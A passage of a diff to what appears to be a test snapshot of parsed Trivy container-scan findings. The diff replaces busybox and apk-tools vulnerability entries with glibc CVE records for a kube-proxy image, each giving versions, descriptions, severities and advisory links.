"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.10.6-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-30139", - "installedVersion": "2.10.5-r1", - "packageName": "apk-tools", - "references": [ - "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", - "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", - ], - }, - "category": "Vulnerability", - "description": "In Alpine Linux apk-tools before 2.12.5, the tarball parser allows a buffer overflow and crash.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Finding in Dependency apk-tools (2.10.5-r1)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-30139", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/12606", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r20", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-28831", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-28831", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", - "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", - "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", - "https://security.gentoo.org/glsa/202105-09", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://ubuntu.com/security/notices/USN-5179-2", - "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", ], }, "category": "Vulnerability", - "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: invalid free or segmentation fault via malformed gzip data", + "name": "glibc: array overflow in backtrace functions for powerpc", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-28831", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-28831", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, { "type": "URL", - "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-09", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-2", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42378", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42378", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42378", + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", + "name": "glibc: use-after-free in glob() function when expanding ~user", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42378", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42378", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", + "value": "https://security.gentoo.org/glsa/202101-20", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + }, + { + "type": "URL", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4416-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4416-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42379", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42379", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42379", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42379", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + }, + { + "type": "URL", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4954-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + }, + { + "type": "URL", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42380", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42380", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42380", + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42380", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42380", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + }, + { + "type": "URL", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + }, + { + "type": "URL", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42381", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42381", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42381", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42381", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": 